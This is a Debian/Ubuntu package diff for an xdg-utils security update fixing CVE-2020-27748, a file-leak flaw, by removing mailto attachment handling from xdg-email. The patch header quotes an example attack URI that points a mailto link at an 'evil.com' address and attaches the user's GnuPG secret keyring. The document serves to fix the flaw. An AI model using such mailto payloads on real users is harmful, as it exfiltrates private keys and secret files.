diff -Nru xdg-utils-1.1.3/debian/changelog xdg-utils-1.1.3/debian/changelog --- xdg-utils-1.1.3/debian/changelog 2020-03-29 23:38:09.000000000 +0000 +++ xdg-utils-1.1.3/debian/changelog 2020-11-24 17:26:08.000000000 +0000 @@ -1,3 +1,12 @@ +xdg-utils (1.1.3-2ubuntu2) hirsute; urgency=medium + + * SECURITY UPDATE: local file inclusion vulnerability + - debian/patches/CVE-2020-27748.patch: remove attachment handling from + mailto in scripts/xdg-email.in. + - CVE-2020-27748 + + -- Leonidas S. Barbosa Tue, 24 Nov 2020 14:26:08 -0300 + xdg-utils (1.1.3-2ubuntu1) focal; urgency=medium * Sync with Debian. Remaining change: diff -Nru xdg-utils-1.1.3/debian/patches/CVE-2020-27748.patch xdg-utils-1.1.3/debian/patches/CVE-2020-27748.patch --- xdg-utils-1.1.3/debian/patches/CVE-2020-27748.patch 1970-01-01 00:00:00.000000000 +0000 +++ xdg-utils-1.1.3/debian/patches/CVE-2020-27748.patch 2020-11-24 17:26:08.000000000 +0000 @@ -0,0 +1,55 @@ +From 1f199813e0eb0246f63b54e9e154970e609575af Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= +Date: Tue, 18 Aug 2020 16:52:24 +0100 +Subject: [PATCH] xdg-email: remove attachment handling from mailto +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +This allows attacker to extract secrets from users: + +mailto:sid@evil.com?attach=/.gnupg/secring.gpg + +See also https://bugzilla.mozilla.org/show_bug.cgi?id=1613425 +and https://gitlab.freedesktop.org/xdg/xdg-utils/-/issues/177 + +Signed-off-by: Jörg Thalheim +--- + scripts/xdg-email.in | 7 +------ + 1 file changed, 1 insertion(+), 6 deletions(-) + +diff --git a/scripts/xdg-email.in b/scripts/xdg-email.in +index 6db58ad..5d2f4f3 100644 +--- a/scripts/xdg-email.in ++++ b/scripts/xdg-email.in +@@ -32,7 +32,7 @@ _USAGE + + run_thunderbird() + { +- local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY ATTACH ++ local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY + THUNDERBIRD="$1" + MAILTO=$(echo "$2" | sed 's/^mailto://') + echo "$MAILTO" | grep -qs "^?" +@@ -48,7 +48,6 @@ run_thunderbird() + BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }')) + SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1) + BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1) +- ATTACH=$(/bin/echo -e $(echo "$MAILTO" | grep '^attach=' | sed 's/^attach=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }' | sed 's/,$//')) + + if [ -z "$TO" ] ; then + NEWMAILTO= +@@ -68,10 +67,6 @@ run_thunderbird() + NEWMAILTO="${NEWMAILTO},$BODY" + fi + +- if [ -n "$ATTACH" ] ; then +- NEWMAILTO="${NEWMAILTO},attachment='${ATTACH}'" +- fi +- + NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//') + DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\"" + "$THUNDERBIRD" -compose "$NEWMAILTO" +-- +GitLab + diff -Nru xdg-utils-1.1.3/debian/patches/debian-changes xdg-utils-1.1.3/debian/patches/debian-changes --- xdg-utils-1.1.3/debian/patches/debian-changes 2020-03-29 23:38:09.000000000 +0000 +++ xdg-utils-1.1.3/debian/patches/debian-changes 2020-11-24 17:26:08.000000000 +0000 @@ -11,6 +11,18 @@ --- +Index: xdg-utils-1.1.3/autotests/t-xdg-open.sh +=================================================================== +Index: xdg-utils-1.1.3/scripts/xdg-email.in +=================================================================== +Index: xdg-utils-1.1.3/scripts/xdg-mime.in +=================================================================== +Index: xdg-utils-1.1.3/scripts/xdg-open.in +=================================================================== +Index: xdg-utils-1.1.3/scripts/xdg-screensaver.in +=================================================================== +Index: xdg-utils-1.1.3/scripts/xdg-utils-common.in +=================================================================== --- xdg-utils-1.1.3.orig/autotests/t-xdg-open.sh +++ xdg-utils-1.1.3/autotests/t-xdg-open.sh @@ -129,13 +129,6 @@ mock_desktop_file mosaic %u @@ -45,7 +57,7 @@ test_generic_open_file test.txt --- xdg-utils-1.1.3.orig/scripts/xdg-email.in +++ xdg-utils-1.1.3/scripts/xdg-email.in -@@ -91,13 +91,13 @@ open_kde() +@@ -86,13 +86,13 @@ open_kde() fi if which $kreadconfig >/dev/null 2>&1; then @@ -65,7 +77,7 @@ if echo "$client" | grep -Eq 'thunderbird|icedove'; then run_thunderbird "$client" "$1" -@@ -472,7 +472,7 @@ case "$DE" in +@@ -467,7 +467,7 @@ case "$DE" in open_gnome "${mailto}" ;; diff -Nru xdg-utils-1.1.3/debian/patches/series xdg-utils-1.1.3/debian/patches/series --- xdg-utils-1.1.3/debian/patches/series 2020-03-29 23:38:09.000000000 +0000 +++ xdg-utils-1.1.3/debian/patches/series 2020-11-24 17:26:08.000000000 +0000 @@ -1 +1,2 @@ +CVE-2020-27748.patch debian-changes